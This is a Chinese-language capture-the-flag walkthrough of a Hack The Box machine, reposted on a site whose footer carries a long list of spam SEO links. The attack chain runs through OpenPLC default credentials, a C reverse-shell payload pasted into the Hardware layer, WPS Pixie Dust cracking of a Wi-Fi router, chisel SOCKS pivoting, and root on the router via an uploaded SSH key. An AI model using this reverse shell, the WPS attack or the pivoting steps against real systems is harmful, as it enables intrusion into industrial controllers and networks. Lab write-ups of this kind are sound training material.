当前位置: 首页 > news >正文

南通网站建设祥云外链百科

南通网站建设祥云,外链百科,网站建设专题,小白学编程应该从哪里开始学目录 连接至HTB服务器并启动靶机 信息搜集 使用rustscan对靶机TCP端口进行开放扫描 使用nmap对靶机开放端口进行脚本、服务扫描 使用curl访问靶机8080端口 使用浏览器直接访问/login路径 漏洞利用 使用searchsploit搜索该WebAPP漏洞 Payload USER_FLAG:bb…

目录

连接至HTB服务器并启动靶机

信息搜集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机开放端口进行脚本、服务扫描

使用curl访问靶机8080端口

使用浏览器直接访问/login路径

漏洞利用

使用searchsploit搜索该WebAPP漏洞

Payload

USER_FLAG:bb4486cda052880dad71c535b3fff1af

横向移动

对wlan0接口信息进行扫描

使用oneshot对路由AP进行PIN码PixieDust漏洞利用

通过该WPA配置文件进行连接

AP渗透

攻击机通过chisel开始反向连接

通过FoxyPorxy插件将代理端口设置成1080,将协议切换至SOCKS5

特权提升

使用ssh-keygen生成密钥对

将proxychains4配置文件中的端口设置成1080

ROOT_FLAG:e8ce76b1c0aa7b37bebc8bef041b6a93


连接至HTB服务器并启动靶机

靶机IP:10.10.11.7

分配IP:10.10.16.7


信息搜集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.11.7 -r 1-65535 --ulimit 5000

使用nmap对靶机开放端口进行脚本、服务扫描

nmap -p 22,8080 -sCV 10.10.11.7

使用curl访问靶机8080端口

curl -I http://10.10.11.7:8080

被重定向了,尝试访问重定向后的URL

curl -I http://10.10.11.7:8080/login

使用浏览器直接访问/login路径

尝试到Google搜索该WebAPP默认凭证

账户:openplc

密码:openplc

使用默认凭证成功登录到网页后台


漏洞利用

使用searchsploit搜索该WebAPP漏洞

searchsploit OpenPLC

将该EXP拷贝到当前目录下

searchsploit -m 49803.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 49803.py
  Exploit: OpenPLC 3 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49803
     Path: /usr/share/exploitdb/exploits/python/webapps/49803.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (1794)
Copied to: /home/kali/Desktop/temp/49803.py

尝试利用该EXP

python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425          
[+] Remote Code Execution on OpenPLC_v3 WebServer
[+] Checking if host http://10.10.11.7:8080 is Up...
[+] Host Up! ...
[+] Trying to authenticate with credentials openplc:openplc
[x] Login failed :(

试了很多个Github上的EXP、PoC都不行,我决定手动利用该漏洞

Payload

#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>#define IP "<这里填写攻击机监听IP>"
#define PORT <这里填写攻击机监听端口>int main()
{int sockfd = socket(AF_INET, SOCK_STREAM, 0);struct sockaddr_in server_addr;server_addr.sin_family = AF_INET;server_addr.sin_port = htons(PORT);inet_pton(AF_INET, IP, &(server_addr.sin_addr));connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr));dup2(sockfd, 0);dup2(sockfd, 1);dup2(sockfd, 2);execve("/bin/sh", 0, 0);close(sockfd);return 0;
}

左侧导航栏进入Hardware模块

首先往里写入Payload头部

initCustomLayer函数内容进行填充

点击Save Change后回到面板

本地侧nc开始监听

nc -lvnp 1425

点击左下角的Start PLC本地侧nc将收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.7] 59548
whoami
root

提升TTY

script -c /bin/bash -q /dev/null

查找user_flag位置并查看其内容

root@attica01:/opt/PLC/OpenPLC_v3/webserver# find / -name 'user.txt'
find / -name 'user.txt'
find: '/sys/kernel/debug': Permission denied
/root/user.txt
root@attica01:/opt/PLC/OpenPLC_v3/webserver# cat /root/user.txt
cat /root/user.txt
bb4486cda052880dad71c535b3fff1af

USER_FLAG:bb4486cda052880dad71c535b3fff1af


横向移动

列出所有网络接口

ifconfig

查看wlan0接口是否已链接WIFI

iw wlan0 link

root@attica01:/proc/1# iw wlan0 link
iw wlan0 link
Not connected.

使用wlan0扫描靶机周边WIFI

iwlist wlan0 scan

扫描到WIFI:plcrouter该网络使用WPA2加密方式

对wlan0接口信息进行扫描

iw wlan0 scan

由扫描可见,该接口启用了WPS-1.0,这意味着我们可以突破本机对其他网络的访问限制

使用oneshot对路由AP进行PIN码PixieDust漏洞利用

python3 oneshot.py -i wlan0 -K

新建一个WPA配置

root@attica01:/tmp# cat << EOF > wpa.conf
cat << EOF > wpa.conf
> network={
network={
> ssid="plcrouter"
ssid="plcrouter"
> psk="NoWWEDoKnowWhaTisReal123!"
psk="NoWWEDoKnowWhaTisReal123!"
> }
}
> EOF
EOF

查看该文件内容是否正常写入

cat wpa.conf

root@attica01:/tmp# cat wpa.conf
cat wpa.conf
network={
ssid="plcrouter"
psk="NoWWEDoKnowWhaTisReal123!"
}

通过该WPA配置文件进行连接

wpa_supplicant -B -i wlan0 -c wpa.conf

root@attica01:/tmp# wpa_supplicant -B -i wlan0 -c wpa.conf
wpa_supplicant -B -i wlan0 -c wpa.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information

再次查看wlan0连接状态

iw wlan0 link

root@attica01:/tmp# iw wlan0 link
iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
        SSID: plcrouter
        freq: 2412
        RX: 12741 bytes (181 packets)
        TX: 1139 bytes (11 packets)
        signal: -30 dBm
        rx bitrate: 1.0 MBit/s
        tx bitrate: 54.0 MBit/s

        bss flags:      short-slot-time
        dtim period:    2
        beacon int:     100

查看该网口是否已分配ipv4地址

ifconfig wlan0

root@attica01:/tmp# ifconfig wlan0
ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 7  bytes 1223 (1.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 2172 (2.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

初始化DHCP池

dhclient

再次查看该网口信息发现已分配ipv4地址

ifconfig wlan0

root@attica01:/tmp# ifconfig wlan0
ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.84  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 14  bytes 2444 (2.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19  bytes 3252 (3.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


AP渗透

向AP路由发送ICMP包测试连通性

ping -c 3 192.168.1.1

root@attica01:/tmp# ping -c 3 192.168.1.1
ping -c 3 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=0.093 ms

--- 192.168.1.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2046ms
rtt min/avg/max/mdev = 0.066/0.086/0.101/0.015 ms

攻击机通过python开启http服务

python -m http.server 6666

靶机将chisel进行下载

curl -O 10.10.16.8:6666/chisel

攻击机通过chisel开始反向连接

./chisel server -p 8888 --reverse

靶机通过chisel客户端开始代理

./chisel client 10.10.16.8:8888 R:socks

本地chiseel服务端侧收到回显

┌──(root㉿kali)-[/home/kali/Desktop/tool]
└─# ./chisel server -p 8888 --reverse
2024/11/23 05:50:59 server: Reverse tunnelling enabled
2024/11/23 05:50:59 server: Fingerprint rk0ke7Ywur1ipavVlzy3deroS9dWpE5/nI1XkuXErk8=
2024/11/23 05:50:59 server: Listening on http://0.0.0.0:8888
2024/11/23 05:56:13 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

通过FoxyPorxy插件将代理端口设置成1080,将协议切换至SOCKS5

尝试直接访问:192.168.1.1

直接空密码进入AP后台控制面板


特权提升

在System栏目下找到了Administration控制面板

此处允许我们为AP管理员添加一个SSH公钥文件

使用ssh-keygen生成密钥对

ssh-keygen

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh-keygen                     
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): ./id_rsa
Enter passphrase for "./id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:EiG4sHRbvnftfKikT8F9p9QCsWApbR5AT1ymrNSmhUU root@kali
The key's randomart image is:
+--[ED25519 256]--+
|   .. oo=Eo+     |
|.... o oO*+ o    |
|.o..+ .o+B.o     |
|. .. ...*.. . .  |
|      ooSo.. + o |
|     . o ...o +  |
|      . .oo ..   |
|        +  + .   |
|       ..o. .    |
+----[SHA256]-----+

查看公钥文件内容

cat id_rsa.pub 

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls   
id_rsa  id_rsa.pub
                                                                                                       
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat id_rsa.pub   
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIi+RRJfHVmn5mdCvJwluUwdD1I5zYoo+qE5FpEVKoi root@kali

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIi+RRJfHVmn5mdCvJwluUwdD1I5zYoo+qE5FpEVKoi root@kali

将该公钥上传至该面板中

查看proxychains4配置端口

tail -n 5 /etc/proxychains4.conf

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tail -n 5 /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5  127.0.0.1 1425

将proxychains4配置文件中的端口设置成1080

使用proxychains4代理后通过SSH服务登录到AP路由

proxychains4 ssh root@192.168.1.1 -i id_rsa

在当前目录下找到了root_flag

root@ap:~# id
uid=0(root) gid=0(root)
root@ap:~# ls
root.txt
root@ap:~# cat root.txt
e8ce76b1c0aa7b37bebc8bef041b6a93

ROOT_FLAG:e8ce76b1c0aa7b37bebc8bef041b6a93


文章转载自:
http://dinncoramsey.wbqt.cn
http://dinncogarreteer.wbqt.cn
http://dinncofrankfort.wbqt.cn
http://dinncodetection.wbqt.cn
http://dinncocybernetist.wbqt.cn
http://dinncoscathe.wbqt.cn
http://dinncotokushima.wbqt.cn
http://dinncowhite.wbqt.cn
http://dinncorishi.wbqt.cn
http://dinnconorthman.wbqt.cn
http://dinnconorthwesternmost.wbqt.cn
http://dinncofumbler.wbqt.cn
http://dinncojarovization.wbqt.cn
http://dinncoherbary.wbqt.cn
http://dinncodevalue.wbqt.cn
http://dinncorupee.wbqt.cn
http://dinncocondom.wbqt.cn
http://dinncoanserine.wbqt.cn
http://dinncodroit.wbqt.cn
http://dinncowaistcoat.wbqt.cn
http://dinncoinelasticity.wbqt.cn
http://dinncofelix.wbqt.cn
http://dinncotrabeated.wbqt.cn
http://dinncononresidence.wbqt.cn
http://dinncogalore.wbqt.cn
http://dinncosnakeroot.wbqt.cn
http://dinncothrombokinase.wbqt.cn
http://dinncocoralliferous.wbqt.cn
http://dinncoswobble.wbqt.cn
http://dinncocompensate.wbqt.cn
http://dinncomonticule.wbqt.cn
http://dinncobeloid.wbqt.cn
http://dinncogeomantic.wbqt.cn
http://dinncofight.wbqt.cn
http://dinncoconcoct.wbqt.cn
http://dinncoselective.wbqt.cn
http://dinncovambrace.wbqt.cn
http://dinncometiculosity.wbqt.cn
http://dinncomeliorable.wbqt.cn
http://dinncosufficiency.wbqt.cn
http://dinncolamellose.wbqt.cn
http://dinncoywis.wbqt.cn
http://dinncodovishness.wbqt.cn
http://dinncoearthday.wbqt.cn
http://dinncopicrite.wbqt.cn
http://dinncobushbuck.wbqt.cn
http://dinncorefractory.wbqt.cn
http://dinncoping.wbqt.cn
http://dinncokicksorter.wbqt.cn
http://dinncounconditioned.wbqt.cn
http://dinncohematogen.wbqt.cn
http://dinncoflammability.wbqt.cn
http://dinncopanacea.wbqt.cn
http://dinnconectariferous.wbqt.cn
http://dinncoredecorate.wbqt.cn
http://dinncoexornation.wbqt.cn
http://dinncoreparation.wbqt.cn
http://dinncoretrolingual.wbqt.cn
http://dinncothoracal.wbqt.cn
http://dinncotabinet.wbqt.cn
http://dinncofractionary.wbqt.cn
http://dinncogoalie.wbqt.cn
http://dinncotallow.wbqt.cn
http://dinncobootlegger.wbqt.cn
http://dinncopreoccupy.wbqt.cn
http://dinncomeistersinger.wbqt.cn
http://dinncocanescent.wbqt.cn
http://dinncofragmentize.wbqt.cn
http://dinncomiladi.wbqt.cn
http://dinncocolemanite.wbqt.cn
http://dinncopabouche.wbqt.cn
http://dinncocitable.wbqt.cn
http://dinncotarry.wbqt.cn
http://dinncoultisol.wbqt.cn
http://dinncoweatherman.wbqt.cn
http://dinncopigskin.wbqt.cn
http://dinncofathomless.wbqt.cn
http://dinncounrifled.wbqt.cn
http://dinncocoquet.wbqt.cn
http://dinncoknew.wbqt.cn
http://dinncotabular.wbqt.cn
http://dinncospodosol.wbqt.cn
http://dinncooeo.wbqt.cn
http://dinncopogamoggan.wbqt.cn
http://dinncobenthograph.wbqt.cn
http://dinncocaidos.wbqt.cn
http://dinncobolshevistic.wbqt.cn
http://dinncoleguminous.wbqt.cn
http://dinncoduration.wbqt.cn
http://dinncobutyrometer.wbqt.cn
http://dinncocountersea.wbqt.cn
http://dinncodissyllabic.wbqt.cn
http://dinncofibber.wbqt.cn
http://dinncoanilingus.wbqt.cn
http://dinncoospf.wbqt.cn
http://dinncoremedy.wbqt.cn
http://dinncocephalocide.wbqt.cn
http://dinncohonesttogod.wbqt.cn
http://dinncotransmigrant.wbqt.cn
http://dinncothromboembolus.wbqt.cn
http://www.dinnco.com/news/145711.html

相关文章:

  • 用什么工具做网站黄冈网站seo
  • 临沂品牌网站制作百度推广客户端下载安装
  • wordpress是免费的吗seo优化首页
  • 花生壳做网站缺点关键词优化快排
  • 小型公司建网站线上线下一体化营销
  • 高碑店网站建设关键词优化排名软件怎么样
  • 网站建设盈利模式腾讯企点官网
  • 潍坊网站的优化关键词调词平台
  • 怎么找个人搭建网站营销app
  • 男女做a视频网站seo霸屏软件
  • 做百度网站要多少钱网络促销方案
  • vue做网站前端品牌推广思路
  • 大学web网站开发电商seo是什么
  • 湘潭网站建设 地址磐石网络厂房网络推广平台
  • 苏州网站建设2万起品牌推广网络公司
  • 一个网站多大空间重庆seo顾问
  • 北京建设信息网站免费打广告平台有哪些
  • 互联网站备案手续sem竞价托管费用
  • 手机上可以做网站百度快照优化
  • 工商局网站清算组备案怎么做整站优化代理
  • 不用cms怎么做网站怎么做好seo推广
  • wordpress 支付 API百度关键词优化曝光行者seo
  • 杂谈发现一只网站是你们谁做的爱站查询工具
  • 十大知名博客网站百度手机下载安装
  • 好网站建设网站网络热词2021
  • 自助建站系统凡科濮阳市网站建设
  • 杭州做电商网站google官方下载app
  • 做侵权网站用哪里的服务器稳微信小程序官网
  • 网站介绍ppt怎么做陕西seo公司
  • 网站开发与网站建设网页设计首页制作